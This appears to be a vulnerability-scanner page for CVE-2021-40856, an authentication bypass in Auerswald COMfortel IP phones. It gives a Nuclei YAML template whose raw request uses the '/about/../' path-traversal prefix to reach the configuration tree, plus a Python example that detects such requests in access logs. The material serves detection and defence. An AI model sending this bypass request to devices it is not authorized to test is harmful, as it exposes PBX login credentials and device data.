Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
ID: CVE-2021-40856
Severity: high
Author: gy741
Tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald
Description
Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix “/about/../” allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
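The following is an added example, not code from the template or from the device firmware. It models the bug class (CWE-706) in which authorization is decided on the raw request path while routing uses the resolved path, and it uses the disagreement between the two as a detection signal over access logs. Assumptions: `/about` is served without a session (as the bypass prefix implies), and the function names and the log format are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: "/about" is served without a session, as the bypass prefix implies.
PUBLIC_PREFIXES = ("/about",)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def _under_public(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PREFIXES)

def is_public_raw(target: str) -> bool:
    """Flawed model: decides on the raw path, before dot-segments are resolved."""
    return _under_public(target.split("?", 1)[0])

def canonical_path(target: str) -> str:
    """Percent-decode once, then resolve '.' and '..' as a handler lookup would."""
    path = unquote(target.split("?", 1)[0])
    return "/" + posixpath.normpath("/" + path).lstrip("/")

def is_public_canonical(target: str) -> bool:
    """Hardened model: authorize the same path that will be routed."""
    return _under_public(canonical_path(target))

def flag_bypass_attempts(log_lines):
    """Return request targets whose raw path looks public but resolves elsewhere."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and is_public_raw(m.group(1)) and not is_public_canonical(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed access-log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2021:10:00:01 +0000] "GET /about/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Dec/2021:10:00:05 +0000] "GET /about/../tree?action=get HTTP/1.1" 200 9321',
    '192.0.2.10 - - [01/Dec/2021:10:00:12 +0000] "GET /tree?action=get HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for target in flag_bypass_attempts(SAMPLE_LOG):
        print("raw check allows; resolves to", canonical_path(target), "<-", target)
```

The same comparison can run in a reverse proxy in front of the device: reject any request whose raw path and canonical path disagree about being public.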
YAML Source
id: CVE-2021-40856

info:
  name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
  author: gy741
  severity: high
  description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the device.
  remediation: |
    Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40856
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
    - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses
    - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40856
    cwe-id: CWE-706
    epss-score: 0.19673
    epss-percentile: 0.96195
    cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: auerswald
    product: comfortel_3600_ip_firmware
  tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald

http:
  - raw:
      - |
        GET /about/../tree?action=get HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"TYPE"'
          - '"ITEMS"'
          - '"COUNT"'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022002abb8758532d5415568eb2b8a48ff1834abf15e6a4025c8221618f116c54009022100ca5bd125637a9894007f879510ee38f5848c7fd75a0275b9ab5f6e5401bb79ee:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40856.yaml"